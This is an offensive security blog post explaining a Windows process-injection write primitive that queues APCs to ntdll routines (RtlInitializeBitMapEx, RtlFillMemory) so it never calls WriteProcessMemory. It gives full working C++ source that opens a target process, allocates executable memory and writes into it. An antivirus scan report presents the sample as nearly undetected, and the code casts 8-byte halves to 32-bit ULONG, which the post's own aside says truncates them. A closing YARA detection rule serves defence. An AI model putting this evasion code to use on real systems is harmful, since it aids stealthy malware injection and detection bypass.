May 14, 2026
Remote Process Write Primitive via APC Routines
S12 - 0x12Dark Development
Welcome to this new Medium post. Today we'll explore a clever process injection primitive that abuses Windows APC (Asynchronous Procedure Call) routines to write arbitrary data into a remote process without ever calling WriteProcessMemory.
This technique, originally documented by trickster0, takes advantage of how APC arguments are passed to queued routines. By carefully selecting Windows API functions whose argument layout matches a memory write operation (like RtlFillMemory and RtlInitializeBitMapEx), we can effectively turn the APC mechanism itself into a remote write primitive.
Why This Matters
Standard process injection workflows typically rely on WriteProcessMemory to deliver payloads into a target process. This API is heavily monitored by security solutions: it's one of the first hooks any defensive product places, and calls to it from non-system processes are a strong indicator of injection.
By replacing WriteProcessMemory with a chain of NtQueueApcThread calls, we achieve the same outcome (arbitrary bytes written to a remote address) while completely skipping the most obvious write API. The data is delivered as function arguments to legitimate ntdll routines, which the target thread executes when its queued APCs are dispatched.
The Core Idea
The trick lies in choosing the right victim functions:
- RtlFillMemory(Destination, Length, Fill): fills Length bytes at Destination with the byte value Fill. By queuing it with Length = 1, we get a 1-byte write primitive where the byte value is whatever we pass as the third argument.
- RtlInitializeBitMapEx(BitMapHeader, BitMapBuffer, SizeOfBitMap): this one is the real gem. Its internal implementation ends up writing the second and third arguments directly to the structure pointed to by the first argument. That gives us a 16-byte write primitive per APC call, where the two 8-byte halves of our data are simply passed as ApcArgument2 and ApcArgument3.
So instead of calling WriteProcessMemory(hProc, dest, buffer, 0x100, NULL), we queue 16 APC calls (0x100 = 256 bytes, each call writing 16 bytes of our buffer) and let the target thread execute them.
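To make the argument layout concrete, here is a minimal local sketch that models the store pattern described above. Nothing here touches another process or calls ntdll: BitmapHeaderLike, init_bitmap_like and write16_via_model are hypothetical names introduced for illustration, and the two-field layout (a 64-bit size followed by a pointer-sized buffer field) is an assumption about the header that RtlInitializeBitMapEx fills in.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Hypothetical local stand-in for the header the routine fills in:
// a 64-bit size at offset 0, then a pointer-sized field at offset 8 (assumed layout).
struct BitmapHeaderLike {
    std::uint64_t size_of_bitmap;  // receives the third argument
    std::uint64_t buffer;          // receives the second argument
};
static_assert(sizeof(BitmapHeaderLike) == 16, "model must cover exactly 16 bytes");

// Local model of the store pattern: (header, arg2, arg3) becomes two 8-byte stores.
inline void init_bitmap_like(void* header, std::uint64_t arg2, std::uint64_t arg3) {
    BitmapHeaderLike h{arg3, arg2};
    std::memcpy(header, &h, sizeof h);  // memcpy avoids alignment assumptions
}

// Writes one 16-byte chunk of src into dst through the model above.
inline void write16_via_model(unsigned char* dst, const unsigned char* src) {
    std::uint64_t low = 0, high = 0;
    std::memcpy(&low, src, 8);       // bytes 0-7  travel as the third argument
    std::memcpy(&high, src + 8, 8);  // bytes 8-15 travel as the second argument
    init_bitmap_like(dst, high, low);
}
```

Calling write16_via_model(dst, src) on two local 16-byte arrays leaves dst byte-for-byte equal to src, which is the whole trick: the third argument lands in the first 8 bytes and the second argument in the next 8.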
Methodology
Before diving into the full source code, let's break down the logic step by step. To achieve a remote memory write without using WriteProcessMemory, we follow these steps:
1. Open the Target Process: First, we obtain a handle to the target process with the right permissions. We call OpenProcess requesting PROCESS_VM_OPERATION (to allocate memory) and PROCESS_VM_WRITE (required by the kernel even when we never call WriteProcessMemory ourselves); the full code below also requests PROCESS_CREATE_THREAD and PROCESS_QUERY_INFORMATION. The target process must be accessible at our integrity level.
2. Allocate Remote Memory: Once we have the process handle, we allocate a buffer inside the target's address space using VirtualAllocEx. This is the destination where our APCs will write the payload chunk by chunk. The allocation is unavoidable: APCs cannot create memory regions, they can only write into them.
3. Create a Sacrificial Thread: We call NtCreateThreadEx to spawn a new thread in the target process, pointing it to RtlExitUserThread as its start routine. The thread is created suspended. It exists only to drain our queued APCs and then cleanly terminate itself; it does not execute the start routine until all APCs are processed.
4. Queue the APCs (The Write Loop): This is the heart of the technique. We walk through our payload buffer in chunks and queue one APC per chunk:
- 16-byte chunks: queued against RtlInitializeBitMapEx. The function's argument layout means our two 8-byte payload halves get written into the destination address.
- 8-byte remainder: also queued against RtlInitializeBitMapEx, but with one argument set to NULL.
- Remaining 1–7 bytes: queued against RtlFillMemory, which writes a single byte per call.
Each APC, when executed, performs a tiny memory write without us ever calling a write API directly.
5. Resume and Wait: We call ResumeThread on our suspended thread. As the thread starts running, its APC queue is drained and each queued routine fires in order, writing its piece of the payload. Once all APCs are processed, control returns to RtlExitUserThread and the thread terminates.
┌──────────────────┐
│ Local Process │
└────────┬─────────┘
│ 1. OpenProcess(hProc)
│ 2. VirtualAllocEx(remoteHeap)
▼
┌─────────────────────────────────────────┐
│ Remote Target Process │
│ │
│ 3. NtCreateThreadEx (SUSPENDED) │
│ └─> StartRoutine: RtlExitUserThread │
│ │
│ 4. NtQueueApcThread × N │
│ ┌─────────────────────────────────┐ │
│ │ APC 1: RtlInitializeBitMapEx │ │
│ │ → writes 16 bytes @ offset 0 │ │
│ ├─────────────────────────────────┤ │
│ │ APC 2: RtlInitializeBitMapEx │ │
│ │ → writes 16 bytes @ offset 16 │ │
│ ├─────────────────────────────────┤ │
│ │ ... │ │
│ ├─────────────────────────────────┤ │
│ │ APC N: RtlFillMemory │ │
│ │ → writes 1 byte (remainder) │ │
│ └─────────────────────────────────┘ │
│ │
│ 5. ResumeThread │
│ └─> APC queue drains │
│ └─> Thread exits cleanly │
│ │
│ Payload now in remoteHeap │
└─────────────────────────────────────────┘
Implementation
Now, let's look at how to translate that logic into C++ code. I have broken down the most important parts.
Resolving the ntdll Functions
We need pointers to the undocumented NT functions and the "victim" routines we'll abuse as write primitives. All of them live inside ntdll.dll, which is loaded in every Windows process, so one GetModuleHandleA call plus one GetProcAddress call per function is enough.
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)GetProcAddress(hNtdll, "NtQueueApcThread");
LPVOID RtlFillMemory = GetProcAddress(hNtdll, "RtlFillMemory");
LPVOID RtlExitUserThread = GetProcAddress(hNtdll, "RtlExitUserThread");
LPVOID RtlInitializeBitMapEx = GetProcAddress(hNtdll, "RtlInitializeBitMapEx");
Two things to note here:
- RtlExitUserThread is the start routine for our sacrificial thread; it just terminates the thread cleanly.
- RtlFillMemory and RtlInitializeBitMapEx are our write primitives in disguise. Their function signatures happen to align perfectly with how NtQueueApcThread passes arguments.
Creating the Sacrificial Thread
Next, we create the thread that will execute our queued APCs. The key argument is the TRUE passed in the CreateFlags position (the seventh argument): its value of 1 requests a suspended thread, so the thread is paused immediately after creation and we can queue APCs before it runs.
HANDLE hThread = NULL;
NtCreateThreadEx(
&hThread,
THREAD_ALL_ACCESS,
NULL,
hProc,
RtlExitUserThread, // Start routine, runs AFTER all APCs are drained
(PVOID)0x00000000, // Argument to start routine (unused)
TRUE, // CreateSuspended
NULL, NULL, NULL, NULL
);
At this point we have a suspended thread inside the remote process. Its APC queue is empty, and nothing has executed yet.
The Alignment Math
Before we start queuing APCs, we need to know how to split the payload. Our primitives operate at three granularities (16 bytes, 8 bytes, and 1 byte) so we calculate how many of each we need:
int alignmentCheck = sizeofVal % 16; // Bytes that don't fit in a 16 byte chunk
int offsetMax = sizeofVal - alignmentCheck; // Bytes that DO fit in 16 byte chunks
int firCounter = 0, eightCounter = 0, secCounter = 0, mod = 0;
For a 44-byte payload, for example, we'd write 32 bytes as two 16-byte chunks, 8 bytes as one 8-byte chunk, and 4 bytes as four 1-byte writes.
The 16 Byte Write Loop
This is the most efficient part: each APC writes 16 bytes at once. The trick is in how NtQueueApcThread passes arguments to RtlInitializeBitMapEx:
if (sizeofVal >= 16) {
for (firCounter = 0; firCounter < offsetMax - 1; firCounter += 16) {
char* heapWriter = (char*)heapAllocation + firCounter;
NtQueueApcThread(
hThread,
(PVOID)RtlInitializeBitMapEx, // ApcRoutine
(PVOID)heapWriter, // Arg1 = destination
(PVOID)*(ULONG_PTR*)((char*)buffer + firCounter + 8),// Arg2 = bytes 8–15
(ULONG) *(ULONG_PTR*)((char*)buffer + firCounter) // Arg3 = bytes 0–7
);
}
}
Here's what's happening: we're not really initializing a bitmap. We're using the fact that RtlInitializeBitMapEx's internal logic writes its 2nd and 3rd arguments to the location pointed to by its 1st argument. By passing 16 bytes of our payload as those two arguments, we get a 16-byte write for free.
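One detail worth checking when packing payload bytes into arguments is the width of each argument. The sketch below is a local illustration with hypothetical helper names (load_u64, narrow_to_32): it loads an 8-byte half with memcpy and shows what happens if that value passes through a 32-bit type. On 64-bit Windows, ULONG is 32 bits wide, so a half that is cast to ULONG keeps only its low four bytes.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Reads 8 payload bytes at offset as one 64-bit value without alignment assumptions.
inline std::uint64_t load_u64(const unsigned char* buffer, std::size_t offset) {
    std::uint64_t value = 0;
    std::memcpy(&value, buffer + offset, sizeof value);
    return value;
}

// Models passing a 64-bit half through a 32-bit parameter and widening it again.
inline std::uint64_t narrow_to_32(std::uint64_t value) {
    return static_cast<std::uint64_t>(static_cast<std::uint32_t>(value));
}
```

With value = 0x1122334455667788, narrow_to_32(value) returns 0x55667788: the upper four bytes are gone. A full 16-byte write therefore needs both halves to travel through pointer-sized parameters end to end.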
The 8-Byte and 1-Byte Cleanup Loops
For payloads that don't divide evenly by 16, we mop up the remainder in two phases. First, any 8 byte chunk we can fit:
if (alignmentCheck >= 8) {
for (eightCounter = firCounter; (eightCounter + 8) < (firCounter + alignmentCheck - 1); eightCounter += 8) {
char* heapWriter = (char*)heapAllocation + eightCounter;
NtQueueApcThread(
hThread,
(PVOID)RtlInitializeBitMapEx,
(PVOID)heapWriter,
NULL, // Arg2 unused for 8 byte write
(ULONG)*(ULONG_PTR*)((char*)buffer + eightCounter) // Arg3 = 8 bytes
);
}
alignmentCheck -= 8;
}
Then, any remaining 1–7 bytes are written one at a time using RtlFillMemory:
for (; secCounter < (mod + alignmentCheck); secCounter++) {
char* heapWriter = (char*)heapAllocation + secCounter;
NtQueueApcThread(
hThread,
(PVOID)RtlFillMemory,
(PVOID)heapWriter, // Arg1 = destination
(PVOID)1, // Arg2 =length (1 byte)
(ULONG)buffer[secCounter] // Arg3 = byte value
);
}
RtlFillMemory(dest, length, value) is essentially memset: by passing length = 1, it writes exactly one byte. We sacrifice efficiency for the last few bytes, but it's never more than 7 calls.
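To sanity-check that the three phases together cover every byte exactly once, the write plan can be replayed against a local buffer. This is a sketch under stated assumptions, not the article's code: WriteOp, plan_writes and replay_locally are hypothetical names, and memcpy stands in for the effect of each queued routine.

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>
#include <vector>

// Hypothetical description of one queued write: where it lands and how wide it is.
struct WriteOp {
    std::size_t offset;
    std::size_t width;  // 16, 8 or 1
};

// Builds the ordered list of writes for a payload of the given size.
inline std::vector<WriteOp> plan_writes(std::size_t size) {
    std::vector<WriteOp> ops;
    std::size_t off = 0;
    for (; off + 16 <= size; off += 16) ops.push_back({off, 16});  // 16-byte phase
    if (off + 8 <= size) {                                          // 8-byte phase
        ops.push_back({off, 8});
        off += 8;
    }
    for (; off < size; ++off) ops.push_back({off, 1});             // 1-byte phase
    return ops;
}

// Replays the plan on a local buffer; memcpy models each write.
inline std::vector<unsigned char> replay_locally(const unsigned char* src, std::size_t size) {
    std::vector<unsigned char> dst(size, 0);
    for (const WriteOp& op : plan_writes(size)) {
        std::memcpy(dst.data() + op.offset, src + op.offset, op.width);
    }
    return dst;
}
```

Replaying the plan for every size from 0 to 64 and comparing the result with the source is a cheap way to catch off-by-one mistakes in the loop bounds, for example a remainder of exactly 8 bytes or a payload shorter than 16 bytes.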
Triggering Execution
With all APCs queued, the suspended thread holds them in its kernel-side APC queue. A single call to ResumeThread makes the kernel drain that queue in FIFO order: each APC fires, performs its tiny write, and returns. Once the queue is empty, the thread proceeds to its actual start routine (RtlExitUserThread) and terminates.
ResumeThread(hThread);
WaitForSingleObject(hThread, INFINITE); // FALSE is a 0 ms timeout and returns immediately; INFINITE waits for the thread to exit
And that's all. Now let's see the whole code.
Code
main.cpp
#include <iostream>
#include <Windows.h>
#include <ntstatus.h>
#include <TlHelp32.h>
//#include <ntdef.h>
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef NTSTATUS(NTAPI* pNtCreateThreadEx)(
PHANDLE hThread,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
HANDLE ProcessHandle,
PVOID StartRoutine,
PVOID Argument,
ULONG CreateFlags,
ULONG_PTR ZeroBits,
SIZE_T StackSize,
SIZE_T MaximumStackSize,
PVOID AttributeList
);
typedef NTSTATUS(NTAPI* pNtQueueApcThread)(
HANDLE ThreadHandle,
PVOID ApcRoutine,
PVOID ApcRoutineContext,
PVOID ApcStatusBlock,
ULONG ApcReserved
);
// https://trickster0.github.io/posts/Primitive-Injection/
void WriteRemoteMemory(HANDLE hProc, LPVOID heapAllocation, int sizeofVal, unsigned char* buffer){
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)GetProcAddress(hNtdll, "NtQueueApcThread");
LPVOID RtlFillMemory = GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlFillMemory");
LPVOID RtlExitUserThread = GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlExitUserThread");
LPVOID RtlInitializeBitMapEx = GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitializeBitMapEx");
HANDLE hThread2 = NULL;
NtCreateThreadEx(&hThread2, THREAD_ALL_ACCESS, NULL, hProc, RtlExitUserThread, (PVOID)0x00000000, TRUE, NULL, NULL, NULL, NULL);
int alignmentCheck = sizeofVal % 16;
int offsetMax = sizeofVal - alignmentCheck;
int firCounter = 0; int eightCounter = 0; int secCounter = 0; int mod = 0;
if (sizeofVal >= 16) {
for (firCounter = 0; firCounter < offsetMax - 1; firCounter = firCounter + 16) {
char* heapWriter = (char*)heapAllocation + firCounter;
NtQueueApcThread(hThread2, (PVOID)RtlInitializeBitMapEx, (PVOID)heapWriter, (PVOID) * (ULONG_PTR*)((char*)buffer + firCounter + 8), (ULONG) * (ULONG_PTR*)((char*)buffer + firCounter));
}
}
if (alignmentCheck >= 8) {
for (eightCounter = firCounter; (eightCounter + 8) < (firCounter + alignmentCheck - 1); eightCounter = eightCounter + 8) {
char* heapWriter = (char*)heapAllocation + eightCounter;
NtQueueApcThread(hThread2, (PVOID)RtlInitializeBitMapEx, (PVOID)heapWriter, NULL, (ULONG) * (ULONG_PTR*)((char*)buffer + eightCounter));
}
alignmentCheck -= 8;
}
if (alignmentCheck != 0 && alignmentCheck < 8) {
if ((firCounter != 0 && eightCounter != 0) || (firCounter != 0 && eightCounter != 0)) {
secCounter = eightCounter;
mod = eightCounter;
}
else if (firCounter != 0 && eightCounter == 0) {
secCounter = firCounter;
mod = firCounter;
}
for (; secCounter < (mod + alignmentCheck); secCounter++) {
char* heapWriter = (char*)heapAllocation + secCounter;
NtQueueApcThread(hThread2, (PVOID)RtlFillMemory, (PVOID)heapWriter, (PVOID)1, (ULONG)buffer[secCounter]);
}
}
ResumeThread(hThread2);
WaitForSingleObject(hThread2, INFINITE); // FALSE is a 0 ms timeout and returns immediately; INFINITE waits for the thread to exit
}
int main()
{
std::cout << "Writting Remote Process Memory!\n";
unsigned char myData[] = "This memory was written using APC routines!";
int dataSize = sizeof(myData);
int pid = 10948;
HANDLE hProc = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION, FALSE, pid);
// 3. Allocate memory in the target process (where the APCs will write to)
LPVOID remoteHeap = VirtualAllocEx(
hProc,
NULL,
dataSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if (remoteHeap == NULL) {
std::cerr << "Failed to allocate remote memory. Error: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Target Memory Address: " << remoteHeap << std::endl;
WriteRemoteMemory(hProc, remoteHeap, dataSize, myData);
std::cout << "Time of verification.. " << std::endl;
getchar();
return 0;
}
Proof of Concept
Writting Remote Process Memory!
Target Memory Address: 00000230621E0000
Detection
Now it's time to see whether defensive products flag this sample as malicious.
Kleenscan API
[*] Antivirus Scan Results:
- alyac | Status: ok | Flag: Undetected | Updated: 2026-05-13
- amiti | Status: ok | Flag: Undetected | Updated: 2026-05-13
- arcabit | Status: ok | Flag: Undetected | Updated: 2026-05-13
- avast | Status: ok | Flag: Undetected | Updated: 2026-05-13
- avg | Status: ok | Flag: Undetected | Updated: 2026-05-13
- avira | Status: scanning | Flag: Scanning results incomplete | Updated: 2026-05-13
- bullguard | Status: ok | Flag: Undetected | Updated: 2026-05-13
- clamav | Status: ok | Flag: Undetected | Updated: 2026-05-13
- comodolinux | Status: ok | Flag: Undetected | Updated: 2026-05-13
- crowdstrike | Status: ok | Flag: Undetected | Updated: 2026-05-13
- drweb | Status: ok | Flag: Undetected | Updated: 2026-05-13
- emsisoft | Status: ok | Flag: Undetected | Updated: 2026-05-13
- escan | Status: ok | Flag: Undetected | Updated: 2026-05-13
- fprot | Status: ok | Flag: Undetected | Updated: 2026-05-13
- fsecure | Status: ok | Flag: Undetected | Updated: 2026-05-13
- gdata | Status: ok | Flag: Undetected | Updated: 2026-05-13
- ikarus | Status: ok | Flag: Trojan.Win64.Krypt | Updated: 2026-05-13
- immunet | Status: ok | Flag: Undetected | Updated: 2026-05-13
- kaspersky | Status: failed | Flag: Scanning results incomplete | Updated: 2026-05-13
- maxsecure | Status: ok | Flag: Undetected | Updated: 2026-05-13
- mcafee | Status: ok | Flag: Undetected | Updated: 2026-05-13
- microsoftdefender | Status: ok | Flag: Undetected | Updated: 2026-05-13
- nano | Status: ok | Flag: Undetected | Updated: 2026-05-13
- nod32 | Status: ok | Flag: Undetected | Updated: 2026-05-13
- norman | Status: ok | Flag: Undetected | Updated: 2026-05-13
- secureageapex | Status: scanning | Flag: Scanning results incomplete | Updated: 2026-05-13
- seqrite | Status: ok | Flag: Undetected | Updated: 2026-05-13
- sophos | Status: ok | Flag: Undetected | Updated: 2026-05-13
- threatdown | Status: ok | Flag: Undetected | Updated: 2026-05-13
- trendmicro | Status: ok | Flag: Undetected | Updated: 2026-05-13
- vba32 | Status: ok | Flag: Undetected | Updated: 2026-05-13
- virusfighter | Status: ok | Flag: Undetected | Updated: 2026-05-13
- xvirus | Status: ok | Flag: Undetected | Updated: 2026-05-13
- zillya | Status: ok | Flag: Undetected | Updated: 2026-05-13
- zonealarm | Status: pending | Flag: N/A | Updated: 2026-05-13
- zoner | Status: ok | Flag: Undetected | Updated: 2026-05-13
YARA
Here is a YARA rule to detect this technique:
rule APC_Argument_Abuse_Write_Primitive
{
meta:
description = "Detects APC-based remote memory write primitive abusing ntdll routines (RtlFillMemory, RtlInitializeBitMapEx) as write gadgets via NtQueueApcThread/NtQueueApcThreadEx2"
author = "0x12 Dark Development"
date = "2026-05-14"
reference = "https://trickster0.github.io/posts/Primitive-Injection/"
severity = "high"
category = "process_injection"
technique = "T1055"
strings:
// Core NT APIs commonly imported by name or resolved dynamically
$api_ntcreatethreadex = "NtCreateThreadEx" ascii wide nocase
$api_ntqueueapc = "NtQueueApcThread" ascii wide nocase
$api_ntqueueapcex = "NtQueueApcThreadEx" ascii wide nocase
$api_ntqueueapcex2 = "NtQueueApcThreadEx2" ascii wide nocase
// Memory operation primitives used as write gadgets
$gadget_fillmemory = "RtlFillMemory" ascii wide
$gadget_bitmap = "RtlInitializeBitMapEx" ascii wide
$gadget_exitthread = "RtlExitUserThread" ascii wide
$gadget_copymemory = "RtlCopyMemory" ascii wide
$gadget_zeromemory = "RtlZeroMemory" ascii wide
$gadget_movememory = "RtlMoveMemory" ascii wide
// Companion APIs typically chained with this primitive
$api_virtualallocex = "VirtualAllocEx" ascii wide
$api_openprocess = "OpenProcess" ascii wide
$api_openthread = "OpenThread" ascii wide
$api_resumethread = "ResumeThread" ascii wide
// Special User APC flag value (NtQueueApcThreadEx2 variant)
// QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC = 0x2, flag pushed as immediate
$special_apc_flag_1 = { B? 02 00 00 00 } // mov reg, 2
$special_apc_flag_2 = { 6A 02 } // push 2
// String literals commonly seen in PoCs/tooling adapted from this primitive
$str_apc_marker = "APC routines" ascii wide nocase
$str_remote_write = "WriteRemoteMemory" ascii wide
// Note: strings that the condition never references were dropped, since YARA rejects unreferenced strings
condition:
uint16(0) == 0x5A4D and // PE header (MZ)
filesize < 5MB and
// Must reference at least one APC queueing API
(
any of ($api_ntqueueapc*)
)
and
// Must reference at least two ntdll routines used as write gadgets
(
2 of ($gadget_fillmemory, $gadget_bitmap, $gadget_exitthread,
$gadget_copymemory, $gadget_zeromemory, $gadget_movememory)
)
and
// Must combine with remote process operation APIs
(
$api_virtualallocex and
($api_openprocess or $api_openthread)
)
and
// Either: classic variant (thread creation + resume)
// Or: Ex2 variant (Special User APC flag present)
(
($api_ntcreatethreadex and $api_resumethread) or
($api_ntqueueapcex2 and any of ($special_apc_flag_1, $special_apc_flag_2)) or
any of ($str_remote_write, $str_apc_marker)
)
}
Here is my collection of YARA rules:
GitHub: S12cybersecurity/YaraRules (collection of interesting YARA rules)
Conclusions
This primitive shows how creative argument abuse can turn legitimate ntdll routines into a fully functional remote write capability, without ever touching WriteProcessMemory. By chaining NtQueueApcThread with carefully chosen victim functions like RtlInitializeBitMapEx and RtlFillMemory, we deliver arbitrary bytes into a remote process using nothing more than the kernel's own APC dispatcher. The result is a write primitive that blends into normal thread activity.
S12.